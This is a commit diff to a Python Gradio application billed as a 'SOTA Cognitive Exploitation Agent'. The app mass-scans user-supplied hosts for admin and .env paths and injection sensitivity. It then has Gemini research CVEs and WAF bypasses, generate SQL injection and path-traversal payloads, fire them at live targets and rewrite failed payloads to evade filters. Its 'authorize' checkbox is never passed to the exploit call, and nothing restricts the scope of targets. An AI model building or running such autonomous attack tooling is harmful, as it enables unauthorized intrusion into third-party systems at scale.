Update app.py

app.py

@@ -19,7 +19,7 @@ except ImportError:
     GEMINI_AVAILABLE = False
 
 # ==============================================================================
-# SOTA COGNITIVE DECISION ENGINE: CLOSED-LOOP AUTONOMY
+# ENGINE CONTROLS & HEADERS
 # ==============================================================================
 
 MAX_CONCURRENT_RECON = 20
@@ -27,7 +27,7 @@ SCAN_TIMEOUT = 5.0
 EXPLOIT_TIMEOUT = 8.0
 
 HTTP_HEADERS = {
-    "User-Agent": "Cognitive-PenTest-Agent/1.0",
+    "User-Agent": "Cognitive-PenTest-Agent/2.0",
     "Accept": "*/*",
     "X-Forwarded-For": "127.0.0.1",
 }
@@ -46,15 +46,10 @@ class PayloadGeneration(BaseModel):
     reasoning: str = Field(description="Why this payload fits the WAF and server profile.")
 
 class PayloadRefinement(BaseModel):
-    failure_analysis: str = Field(description="Analysis of why the previous payload failed based on the HTTP response diff and timing.")
-    adjusted_strategy: str = Field(description="How the approach changes (e.g., 'Switching to URL encoding').")
+    failure_analysis: str = Field(description="Why the previous payload failed based on response diff.")
+    adjusted_strategy: str = Field(description="How the approach changes.")
     revised_payload: str = Field(description="The newly patched payload.")
 
-class ChatResponse(BaseModel):
-    chat_reply: str = Field(description="Message to human operator.")
-    suggested_endpoint: str = Field(description="Updated endpoint.")
-    suggested_payload: str = Field(description="Revised payload.")
-
 # --- 2. SIGNAL-RICH RECON ENGINE ---
 
 class ReconProfile:
@@ -63,14 +58,20 @@ class ReconProfile:
         self.host = host
         self.port = port
         self.protocol = "http"
+        self.is_alive = False
         self.server_banner = "Unknown"
+        self.server_version = "Unknown"
         self.waf_detected = "None"
         self.baseline_latency = 0.0
-        self.base_response_length = 0
         
         self.discovered_paths = []
-        self.injection_sensitivity = [] # How it reacts to ' " ( ) ;
-        self.error_signatures = [] # Leaked stack traces
+        self.injection_sensitivity = [] 
+        self.error_signatures = [] 
+    
+    @property
+    def is_exploitable(self):
+        # Determine if it's worth showing in the War Room
+        return self.is_alive and (len(self.discovered_paths) > 0 or len(self.error_signatures) > 0 or self.server_version != "Unknown")
 
 class SensorReconEngine:
     def __init__(self, profile: ReconProfile, logger: callable):
@@ -96,60 +97,61 @@ class SensorReconEngine:
         await self._detect_protocol()
         try:
             await self.profile_baseline()
-            await self.probe_injection_sensitivity()
-            await self.dynamic_path_expansion()
+            if self.p.is_alive:
+                await self.probe_injection_sensitivity()
+                await self.dynamic_path_expansion()
         finally:
             await self.client.aclose()
         return self.p
 
     async def profile_baseline(self):
-        """Measures baseline latency and response size, fingerprints server."""
         start = time.time()
         try:
             resp = await self.client.get(self._url("/"))
+            self.p.is_alive = True
             self.p.baseline_latency = time.time() - start
-            self.p.base_response_length = len(resp.text)
             
-            srv = resp.headers.get("Server", "").lower()
-            self.p.server_banner = srv
-            if "cloudflare" in srv: self.p.waf_detected = "Cloudflare"
-            if "imperva" in srv: self.p.waf_detected = "Imperva"
+            srv = resp.headers.get("Server", "")
+            if srv:
+                self.p.server_banner = srv
+                # Better Version Extraction
+                version_match = re.search(r'[\w-]+/([\d\.]+)', srv)
+                if version_match: self.p.server_version = version_match.group(1)
             
-            self.logger(f"📊 Baseline [{self.p.target_id}]: Latency {self.p.baseline_latency:.2f}s | WAF: {self.p.waf_detected}")
-        except Exception: pass
+            srv_lower = srv.lower()
+            if "cloudflare" in srv_lower: self.p.waf_detected = "Cloudflare"
+            elif "imperva" in srv_lower: self.p.waf_detected = "Imperva"
+            
+            self.logger(f"✅ Alive [{self.p.target_id}]: {self.p.server_banner} | WAF: {self.p.waf_detected}")
+        except Exception: 
+            self.logger(f"❌ Dead [{self.p.target_id}]")
 
     async def probe_injection_sensitivity(self):
-        """Sends neutral anomalies to see if the server leaks errors or sanitizes inputs."""
-        probes = [("?id=1'", "single_quote"), ("?q=\"><script>", "html_tags"), ("?file=../../", "traversal_chars")]
+        probes = [("?id=1'", "quote"), ("?q=\"><script>", "html"), ("?file=../../", "traversal")]
         for path, tag in probes:
             try:
                 resp = await self.client.get(self._url(path))
                 body = resp.text.lower()
-                # Check for error leaks
                 if any(err in body for err in ["sql syntax", "mysql_fetch", "stack trace", "java.lang"]):
                     self.p.error_signatures.append(f"{tag}_leak")
-                    self.logger(f"🚨 Sensitivity Alert [{self.p.target_id}]: Error signature leaked on {tag}")
                 elif resp.status_code in [403, 406]:
                     self.p.injection_sensitivity.append(f"{tag}_blocked")
             except: pass
 
     async def dynamic_path_expansion(self):
-        """If a base path exists, recursively check deeper."""
-        base_paths = ["/api", "/admin", "/.env"]
+        base_paths = ["/api", "/admin", "/.env", "/wp-admin", "/phpmyadmin"]
         for bp in base_paths:
             try:
                 resp = await self.client.get(self._url(bp))
                 if resp.status_code in [200, 401, 403, 301, 302]:
                     self.p.discovered_paths.append(bp)
-                    self.logger(f"📂 Discovered Base Path: {bp}")
-                    # Dynamic Expansion
                     if bp == "/api":
                         exp_resp = await self.client.get(self._url("/api/v1/users"))
                         if exp_resp.status_code == 200: self.p.discovered_paths.append("/api/v1/users")
             except: pass
 
 
-# --- 3. THE AUTONOMOUS AGENT (EXPLOIT STATE MACHINE) ---
+# --- 3. AUTONOMOUS AGENT (FIXED GOOGLE GROUNDING & SCHEMA) ---
 
 async def fire_payload(protocol, host, port, endpoint, payload):
     url = f"{protocol}://{host}:{port}{endpoint}{payload}"
@@ -159,9 +161,9 @@ async def fire_payload(protocol, host, port, endpoint, payload):
             resp = await client.get(url)
             latency = time.time() - start
             success = False
-            # Universal Success Metrics
+            
             if "root:x:0:0" in resp.text or "[extensions]" in resp.text: success = True
-            if latency > (SCAN_TIMEOUT + 3.0) and "SLEEP" in payload.upper(): success = True
+            if latency > (SCAN_TIMEOUT + 2.0) and "SLEEP" in payload.upper(): success = True
             
             return success, resp.status_code, latency, resp.text[:250].replace('\n', ' ')
     except Exception as e:
@@ -175,101 +177,93 @@ async def autonomous_exploit_agent(profile: ReconProfile, api_key: str, logger:
 
     llm = genai.Client(api_key=api_key)
     
-    # AI Configuration with Google Search Grounding for current CVE research
-    config_strategy = types.GenerateContentConfig(
-        tools=[types.Tool(google_search=types.GoogleSearch())],
-        response_mime_type="application/json", 
-        response_json_schema=AttackStrategy.model_json_schema(),
-        temperature=0.2
-    )
-
     recon_evidence = f"""
-    TARGET EVIDENCE PROFILE:
-    Target: {profile.target_id}
-    Server: {profile.server_banner}
-    WAF Detected: {profile.waf_detected}
-    Baseline Latency: {profile.baseline_latency:.3f}s
-    Error Leaks: {profile.error_signatures}
-    Blocked Injections: {profile.injection_sensitivity}
-    Discovered Paths: {profile.discovered_paths}
+    TARGET: {profile.target_id}
+    Server: {profile.server_banner} (Version: {profile.server_version})
+    WAF: {profile.waf_detected}
+    Paths: {profile.discovered_paths}
+    Errors Leaked: {profile.error_signatures}
+    Blocked Inputs: {profile.injection_sensitivity}
     """
 
-    # STATE 1: STRATEGIZING
-    logger(f"🧠 [STRATEGIZING] Researching & Classifying {profile.target_id}")
-    await update_ui_cb("🧠 STRATEGIZING", "Researching via Google Search & building Attack Strategy...")
+    # ------------------------------------------------------------------
+    # PHASE 1: RESEARCH (Allows Google Search, No JSON constraint)
+    # ------------------------------------------------------------------
+    logger(f"🔎 [RESEARCHING] Grounding with Google Search for {profile.target_id}")
+    await update_ui_cb("🔎 RESEARCHING", "Querying Google Search for CVEs and bypasses...")
     
     try:
-        strat_resp = await llm.aio.models.generate_content(
-            model="gemini-2.5-flash",
-            contents=recon_evidence + "\nUse Google Search to find CVEs/bypasses for this server/WAF. Then formulate an AttackStrategy.",
-            config=config_strategy
+        research_config = types.GenerateContentConfig(tools=[types.Tool(google_search=types.GoogleSearch())])
+        research_prompt = f"Find recent CVEs and WAF bypass techniques for {profile.server_banner} behind {profile.waf_detected}. Keep it brief."
+        research_resp = await llm.aio.models.generate_content(
+            model="gemini-2.5-flash", contents=research_prompt, config=research_config
         )
+        search_context = research_resp.text
+    except Exception as e:
+        search_context = "Search failed. Relying on base knowledge."
+        logger(f"⚠️ Search skipped: {e}")
+
+    # ------------------------------------------------------------------
+    # PHASE 2: STRATEGIZING (Strict JSON Schema, NO Google Search)
+    # ------------------------------------------------------------------
+    logger(f"🧠 [STRATEGIZING] Building attack plan.")
+    await update_ui_cb("🧠 STRATEGIZING", "Formatting Attack Strategy...")
+    
+    try:
+        strat_config = types.GenerateContentConfig(response_mime_type="application/json", response_json_schema=AttackStrategy.model_json_schema())
+        strat_prompt = f"Recon: {recon_evidence}\nSearch Data: {search_context}\nOutput AttackStrategy."
+        strat_resp = await llm.aio.models.generate_content(model="gemini-2.5-flash", contents=strat_prompt, config=strat_config)
         strategy = AttackStrategy.model_validate_json(strat_resp.text)
     except Exception as e:
-        logger(f"⚠️ Strategy Gen Failed: {e}")
-        return
+        logger(f"⚠️ Strategy Gen Failed: {e}"); return
 
-    # STATE 2: PAYLOAD GENERATION
-    logger(f"⚙️ [GENERATING] Creating payload for {strategy.vulnerability_class}")
+    # ------------------------------------------------------------------
+    # PHASE 3: PAYLOAD GENERATION
+    # ------------------------------------------------------------------
     await update_ui_cb("⚙️ GENERATING", f"Crafting {strategy.strategy} payload...")
-    
-    config_gen = types.GenerateContentConfig(response_mime_type="application/json", response_json_schema=PayloadGeneration.model_json_schema(), temperature=0.3)
     try:
+        gen_config = types.GenerateContentConfig(response_mime_type="application/json", response_json_schema=PayloadGeneration.model_json_schema())
         gen_resp = await llm.aio.models.generate_content(
-            model="gemini-2.5-flash",
-            contents=f"Strategy: {strategy.model_dump_json()}\nRecon: {recon_evidence}\nGenerate the specific payload.",
-            config=config_gen
+            model="gemini-2.5-flash", contents=f"Strategy: {strategy.model_dump_json()}\nGenerate payload.", config=gen_config
         )
         gen = PayloadGeneration.model_validate_json(gen_resp.text)
         current_endpoint, current_payload = strategy.target_endpoint, gen.payload
     except Exception as e:
          logger(f"⚠️ Payload Gen Failed: {e}"); return
 
-    # THE EXECUTION & REFINEMENT LOOP
+    # ------------------------------------------------------------------
+    # PHASE 4: EXECUTION & REFINEMENT LOOP
+    # ------------------------------------------------------------------
     for attempt in range(1, 4):
-        # STATE 3: EXPLOITING
-        logger(f"⚔️ [EXPLOITING] Attempt {attempt} on {current_endpoint}")
+        logger(f"⚔️ [EXPLOITING] Attempt {attempt}: {current_payload}")
         await update_ui_cb(f"⚔️ EXPLOITING (Try {attempt}/3)", f"Firing: {current_payload}")
         
         success, status, latency, snippet = await fire_payload(profile.protocol, profile.host, profile.port, current_endpoint, current_payload)
         
-        # STATE 4: ANALYZING
-        await update_ui_cb("📊 ANALYZING FEEDBACK", f"Status: {status} | Latency: {latency:.2f}s | Diff checking...")
+        await update_ui_cb("📊 ANALYZING FEEDBACK", f"Status: {status} | Latency: {latency:.2f}s")
+        
+        # Yield the exact payload and result to the UI!
+        yield current_endpoint, current_payload, "SUCCESS 💥" if success else f"FAILED (HTTP {status})", snippet
         
         if success:
-            logger(f"💥 [SUCCESS] Exploit triggered on {profile.target_id}!")
-            yield current_endpoint, current_payload, "SUCCESS 💥", f"Confirmed {strategy.vulnerability_class}. Latency: {latency:.2f}s"
+            logger(f"💥 [SUCCESS] Triggered on {profile.target_id}!")
             return
             
         if attempt == 3: break
 
-        # STATE 5: REFINING
         logger(f"🔧 [REFINING] Payload failed. Asking AI to patch...")
         await update_ui_cb("🔧 REFINING", "Analyzing failure diff and rewriting payload...")
         
-        feedback = f"""
-        PREVIOUS PAYLOAD: {current_payload}
-        OUTCOME: Failed.
-        FEEDBACK METRICS:
-        - HTTP Status: {status}
-        - Latency: {latency:.2f}s (Baseline was {profile.baseline_latency:.2f}s)
-        - Response Snippet: {snippet}
-        
-        Analyze the failure and provide a PayloadRefinement.
-        """
-        config_patch = types.GenerateContentConfig(response_mime_type="application/json", response_json_schema=PayloadRefinement.model_json_schema(), temperature=0.4)
         try:
-            patch_resp = await llm.aio.models.generate_content(
-                model="gemini-2.5-flash", contents=feedback, config=config_patch
-            )
+            feedback = f"Payload: {current_payload}\nFailed. Status: {status}, Latency: {latency:.2f}s.\nSnippet: {snippet}\nPatch it to bypass restrictions."
+            patch_config = types.GenerateContentConfig(response_mime_type="application/json", response_json_schema=PayloadRefinement.model_json_schema())
+            patch_resp = await llm.aio.models.generate_content(model="gemini-2.5-flash", contents=feedback, config=patch_config)
             patch = PayloadRefinement.model_validate_json(patch_resp.text)
             current_payload = patch.revised_payload
-            logger(f"��� AI Insight: {patch.failure_analysis}")
         except Exception:
-            pass # Fallback to loop if API drops
+            pass # Fallback to next loop iteration
 
     logger(f"🛑 [ABORT] Exhausted attempts on {profile.target_id}")
-    yield current_endpoint, current_payload, "FAILED", f"Analyzed 3 variations. WAF/Server resilient."
 
 
 # --- UI ASYNC WRAPPERS & UTILS ---
@@ -301,7 +295,7 @@ async def run_recon_phase(files, manual, state):
     targets = parse_inputs(files, manual)
     
     if not targets:
-        yield state, gr.update(), "🔴 No targets provided.", log_text
+        yield state, pd.DataFrame(), gr.update(), "🔴 No targets provided.", log_text
         return
 
     logger(f"🚀 [STAGE 1] Sensor Recon initiated on {len(targets)} targets.")
@@ -318,14 +312,27 @@ async def run_recon_phase(files, manual, state):
             state["profiles"][profile.target_id] = profile
         except Exception: pass
         
+        # Flush logs to UI
         while not log_queue.empty(): log_text = f"[{time.strftime('%X')}] {log_queue.get_nowait()}\n" + log_text
-        log_text = '\n'.join(log_text.split('\n')[:100])
-        choices = list(state["profiles"].keys())
-        yield state, gr.update(choices=choices), f"🟡 **Scanning:** Extracted {len(choices)} target profiles...", log_text
+        log_text = '\n'.join(log_text.split('\n')[:150])
+        
+        # Update Data Viewer & Dropdown
+        all_profs = list(state["profiles"].values())
+        df = pd.DataFrame([{
+            "Target": p.target_id, "Protocol": p.protocol, "Server": p.server_banner, 
+            "WAF": p.waf_detected, "Paths": len(p.discovered_paths), "Errors": len(p.error_signatures),
+            "Exploitable": "Yes" if p.is_exploitable else "No"
+        } for p in all_profs])
+        
+        # Only put exploitable targets in the War Room Dropdown
+        exploitable_targets = [p.target_id for p in all_profs if p.is_exploitable]
+        
+        yield state, df, gr.update(choices=exploitable_targets), f"🟡 Scanning... {len(all_profs)}/{len(targets)} done.", log_text
 
-    while not log_queue.empty(): log_text = f"[{time.strftime('%X')}] {log_queue.get_nowait()}\n" + log_text
     logger("✅ [STAGE 1] Recon Complete.")
-    yield state, gr.update(choices=list(state["profiles"].keys()), value=list(state["profiles"].keys())[0] if state["profiles"] else None), "🟢 **Recon Complete!** Move to the War Room.", log_text
+    while not log_queue.empty(): log_text = f"[{time.strftime('%X')}] {log_queue.get_nowait()}\n" + log_text
+    yield state, df, gr.update(choices=exploitable_targets, value=exploitable_targets[0] if exploitable_targets else None), "🟢 Recon Complete!", log_text
+
 
 async def run_exploit_phase(target_id, api_key, state):
     log_queue = asyncio.Queue()
@@ -333,42 +340,42 @@ async def run_exploit_phase(target_id, api_key, state):
     log_text = ""
     
     if not api_key or not target_id:
-        yield "🔴 Error", "N/A", "N/A", "N/A", "N/A", log_text
+        yield "🔴 Error", "No Target/Key", "", "", "", log_text
         return
 
     profile = state["profiles"][target_id]
+    ui_state, ui_detail = "INIT", "Starting Agent..."
     
-    # Callback to update the State Machine UI
-    ui_state = ""
-    ui_detail = ""
     async def update_ui(s, d):
         nonlocal ui_state, ui_detail
         ui_state, ui_detail = s, d
 
     agent_gen = autonomous_exploit_agent(profile, api_key, logger, update_ui)
     
-    # We must consume the agent loop while updating UI
     ep, pl, res, det = "", "", "", ""
     
-    # Polling loop to keep UI fresh
-    agent_task = asyncio.create_task(agent_gen.__anext__())
-    while not agent_task.done():
-        try:
-            msg = await asyncio.wait_for(log_queue.get(), timeout=0.2)
-            log_text = f"[{time.strftime('%X')}] {msg}\n" + log_text
-        except asyncio.TimeoutError: pass
+    # Process generator to update payload textboxes in real-time
+    async for new_ep, new_pl, new_res, new_det in agent_gen:
+        ep, pl, res, det = new_ep, new_pl, new_res, new_det
+        
+        while not log_queue.empty(): log_text = f"[{time.strftime('%X')}] {log_queue.get_nowait()}\n" + log_text
+        log_text = '\n'.join(log_text.split('\n')[:150])
         
-        log_text = '\n'.join(log_text.split('\n')[:100])
         yield ui_state, ui_detail, ep, pl, res, log_text
-    
-    try:
-        ep, pl, res, det = agent_task.result()
-    except StopAsyncIteration: pass
 
-    while not log_queue.empty(): log_text = f"[{time.strftime('%X')}] {log_queue.get_nowait()}\n" + log_text
     yield "✅ COMPLETE", det, ep, pl, res, log_text
 
 
+# --- DATAFRAME FILTER FUNCTION ---
+def filter_data(df, search_ip, search_port, show_only_vuln):
+    if df is None or df.empty: return df
+    filtered = df.copy()
+    if search_ip: filtered = filtered[filtered["Target"].str.contains(search_ip, case=False, na=False)]
+    if search_port: filtered = filtered[filtered["Target"].str.endswith(f":{search_port}")]
+    if show_only_vuln: filtered = filtered[filtered["Exploitable"] == "Yes"]
+    return filtered
+
+
 # ==============================================================================
 # GRADIO UI
 # ==============================================================================
@@ -376,26 +383,35 @@ with gr.Blocks(theme=gr.themes.Monochrome()) as demo:
     engine_state = gr.State({"profiles": {}})
 
     gr.Markdown("# 💀 SOTA Cognitive Exploitation Agent")
-    gr.Markdown("Features: **Signal-Rich Recon**, **Google Search Grounding**, and **Closed-Loop Reasoning (Strategize $\\rightarrow$ Exploit $\\rightarrow$ Refine)**.")
-
+    
     with gr.Tabs():
-        # --- TAB 1: RECON ---
-        with gr.Tab("1. Sensor Reconnaissance"):
+        # --- TAB 1: ACQUISITION & DATABASE ---
+        with gr.Tab("1. Sensor Recon & Database"):
             with gr.Row():
-                with gr.Column():
+                with gr.Column(scale=1):
                     csv_in = gr.File(label="Upload CSV (Host, Port)", file_count="multiple")
                     txt_in = gr.Textbox(label="Manual Targets", lines=3, placeholder="192.168.1.1:80")
                     recon_btn = gr.Button("🔍 START SENSOR RECON", variant="primary")
-                    api_key_in = gr.Textbox(label="Gemini API Key (Required for Agent)", type="password")
-                with gr.Column():
                     recon_status = gr.Markdown("System Offline.")
-                    log_console = gr.Code(label="Live Recon Telemetry", language="shell", lines=15)
+                    log_console = gr.Code(label="Live Recon Telemetry", language="shell", lines=12)
+                
+                with gr.Column(scale=2):
+                    gr.Markdown("### 🗄️ Reconnaissance Database Viewer")
+                    with gr.Row():
+                        f_ip = gr.Textbox(label="Search IP", scale=2)
+                        f_port = gr.Textbox(label="Filter Port", scale=1)
+                        f_vuln = gr.Checkbox(label="Show Only Potentially Exploitable", value=False, scale=1)
                     
+                    db_viewer = gr.Dataframe(headers=["Target", "Protocol", "Server", "WAF", "Paths", "Errors", "Exploitable"], interactive=False)
+
         # --- TAB 2: WAR ROOM ---
         with gr.Tab("2. Agentic War Room"):
             with gr.Row():
                 with gr.Column(scale=1):
-                    target_dropdown = gr.Dropdown(label="Extracted Target Profiles", choices=[], interactive=True)
+                    gr.Markdown("### 💀 Authorize AI Agent")
+                    api_key_in = gr.Textbox(label="Gemini API Key (Required)", type="password")
+                    # ONLY exploitable targets show up here
+                    target_dropdown = gr.Dropdown(label="Potentially Exploitable Targets", choices=[], interactive=True)
                     exploit_consent = gr.Checkbox(label="🚨 Authorize AI Agent (Execute live exploits)", value=False)
                     fire_agent_btn = gr.Button("⚡ DEPLOY AUTONOMOUS AGENT", variant="primary")
                     
@@ -408,18 +424,34 @@ with gr.Blocks(theme=gr.themes.Monochrome()) as demo:
                     ep_box = gr.Textbox(label="Target Endpoint", interactive=False)
                     pl_box = gr.Textbox(label="Injected Payload", interactive=False)
                     res_box = gr.Textbox(label="Final Result", interactive=False)
+                    exploit_console = gr.Code(label="Agent Terminal", language="shell", lines=15)
 
     # --- WIRING ---
     recon_btn.click(
         fn=run_recon_phase,
         inputs=[csv_in, txt_in, engine_state],
-        outputs=[engine_state, target_dropdown, recon_status, log_console]
+        outputs=[engine_state, db_viewer, target_dropdown, recon_status, log_console]
     )
 
+    # Live Database Filtering
+    filter_inputs = [db_viewer, f_ip, f_port, f_vuln]
+    for comp in [f_ip, f_port, f_vuln]:
+        comp.change(fn=filter_data, inputs=[engine_state, f_ip, f_port, f_vuln], outputs=[db_viewer])
+
+    # Ensure we use raw state for filtering logic
+    def apply_filter(st, ip, port, vuln):
+        all_profs = list(st.get("profiles", {}).values())
+        df = pd.DataFrame([{"Target": p.target_id, "Protocol": p.protocol, "Server": p.server_banner, "WAF": p.waf_detected, "Paths": len(p.discovered_paths), "Errors": len(p.error_signatures), "Exploitable": "Yes" if p.is_exploitable else "No"} for p in all_profs])
+        return filter_data(df, ip, port, vuln)
+
+    f_ip.change(fn=apply_filter, inputs=[engine_state, f_ip, f_port, f_vuln], outputs=[db_viewer])
+    f_port.change(fn=apply_filter, inputs=[engine_state, f_ip, f_port, f_vuln], outputs=[db_viewer])
+    f_vuln.change(fn=apply_filter, inputs=[engine_state, f_ip, f_port, f_vuln], outputs=[db_viewer])
+
     fire_agent_btn.click(
         fn=run_exploit_phase,
         inputs=[target_dropdown, api_key_in, engine_state],
-        outputs=[state_box, detail_box, ep_box, pl_box, res_box, log_console]
+        outputs=[state_box, detail_box, ep_box, pl_box, res_box, exploit_console]
     )
 
 if __name__ == "__main__":